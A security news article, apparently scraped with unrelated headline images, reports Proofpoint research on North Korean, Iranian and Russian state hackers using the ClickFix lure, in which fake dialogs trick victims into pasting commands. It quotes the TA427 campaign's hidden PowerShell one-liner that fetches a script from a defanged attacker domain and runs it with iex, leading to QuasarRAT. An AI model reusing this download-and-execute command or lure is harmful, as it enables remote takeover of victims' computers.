![Apple Shares Official Trailer for 'Long Way Home' Starring Ewan McGregor and Charley Boorman [Video]](https://www.iclarified.com/images/news/97069/97069/97069-640.jpg)
![Apple Watch Series 10 Back On Sale for $299! [Lowest Price Ever]](https://www.iclarified.com/images/news/96657/96657/96657-640.jpg)
![Apple Slips to Fifth in China's Smartphone Market with 9% Decline [Report]](https://www.iclarified.com/images/news/97065/97065/97065-640.jpg)
![EU Postpones Apple App Store Fines Amid Tariff Negotiations [Report]](https://www.iclarified.com/images/news/97068/97068/97068-640.jpg)
![What features do you get with Gemini Advanced? [April 2025]](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2024/02/gemini-advanced-cover.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
_Andreas_Prott_Alamy.jpg?width=1280&auto=webp&quality=80&disable=upscale#)
![[The AI Show Episode 144]: ChatGPT’s New Memory, Shopify CEO’s Leaked “AI First” Memo, Google Cloud Next Releases, o3 and o4-mini Coming Soon & Llama 4’s Rocky Launch](https://www.marketingaiinstitute.com/hubfs/ep%20144%20cover.png)
![Is this too much for a modular monolith system? [closed]](https://i.sstatic.net/pYL1nsfg.png)
![[FREE EBOOKS] Machine Learning Hero, AI-Assisted Programming for Web and Machine Learning & Four More Best Selling Titles](https://www.javacodegeeks.com/wp-content/uploads/2012/12/jcg-logo.jpg){kind=logo}
State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
Security researchers have identified a concerning trend in the cyber threat landscape as state-sponsored hackers from multiple countries have begun adopting a relatively new social engineering technique called “ClickFix” in their espionage operations. The technique, which emerged in early March 2024 in cybercriminal circles, has rapidly gained popularity among advanced persistent threat (APT) groups due […] The post State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns appeared first on Cyber Security News.
Security researchers have identified a concerning trend in the cyber threat landscape as state-sponsored hackers from multiple countries have begun adopting a relatively new social engineering technique called “ClickFix” in their espionage operations.
The technique, which emerged in early March 2024 in cybercriminal circles, has rapidly gained popularity among advanced persistent threat (APT) groups due to its effectiveness in bypassing traditional security controls.
ClickFix represents a creative social engineering approach that employs dialogue boxes with instructions to trick victims into copying, pasting, and running malicious commands on their machines.
What makes the technique particularly insidious is its dual-pronged approach: first presenting users with a fake error message as a problem, then providing an authoritative alert with instructions supposedly from the operating system as a solution.
Proofpoint researchers noted that over a relatively short three-month period from late 2024 through early 2025, state-sponsored threat actors from North Korea, Iran, and Russia all incorporated the ClickFix technique into their routine espionage campaigns.
This rapid adoption across multiple nation-state actors signals a significant evolution in how APT groups are refining their tactics.
The migration of ClickFix from cybercriminal to state-sponsored usage represents a notable shift in the threat landscape, as it effectively replaces traditional installation and execution stages in existing infection chains with a method that leverages human interaction to bypass security measures.
Despite its growing popularity, researchers observed that most groups experimented with the technique in limited campaigns before returning to their standard operational tactics.
One particularly sophisticated application was observed in campaigns associated with TA427, a threat actor linked to North Korea (also known as Kimsuky or Emerald Sleet). The group targeted individuals working on North Korean affairs by masquerading as Japanese diplomatic personnel.
.webp)
After establishing initial contact and building trust through benign communications, the attackers directed victims to an attacker-controlled website spoofing a secure document sharing platform.
ClickFix Infection Mechanism
The infection mechanism employed in these attacks demonstrates significant technical sophistication while maintaining simplicity in execution.
When victims visited the malicious landing page, they were presented with a registration dialogue box containing instructions to “register” their device.
The dialogue prompted users to perform seemingly innocuous actions:-
1. Copy the register code: JPEMB-76FR3-9G87H-7ZC56
2. Press "Windows key + R" to open Run
3. Press "Ctrl+V"
4. Press "Enter"What victims didn’t realize was that the copied “registration code” actually contained a disguised PowerShell command:-
powershell -windowstyle hidden -Command iwr
"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -
OutFile
"$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw;
iex
$C;When executed, this command silently downloaded and ran additional PowerShell scripts, which displayed a decoy PDF document to maintain the illusion of legitimacy while creating scheduled tasks for persistence.
The final payload in TA427’s case was QuasarRAT, a remote access trojan that provides attackers with complete control over the compromised system.
.webp)
Similar techniques were observed in campaigns by Iranian group TA450 (also known as MuddyWater) and Russian threat actors, each adapting ClickFix to their existing tactics and infrastructure.
While currently limited to experimental usage by these state-sponsored groups, the increasing popularity of ClickFix in both cybercrime and espionage campaigns suggests the technique will likely become more widely adopted as threat actors continue to refine their social engineering approaches.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
The post State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns appeared first on Cyber Security News.
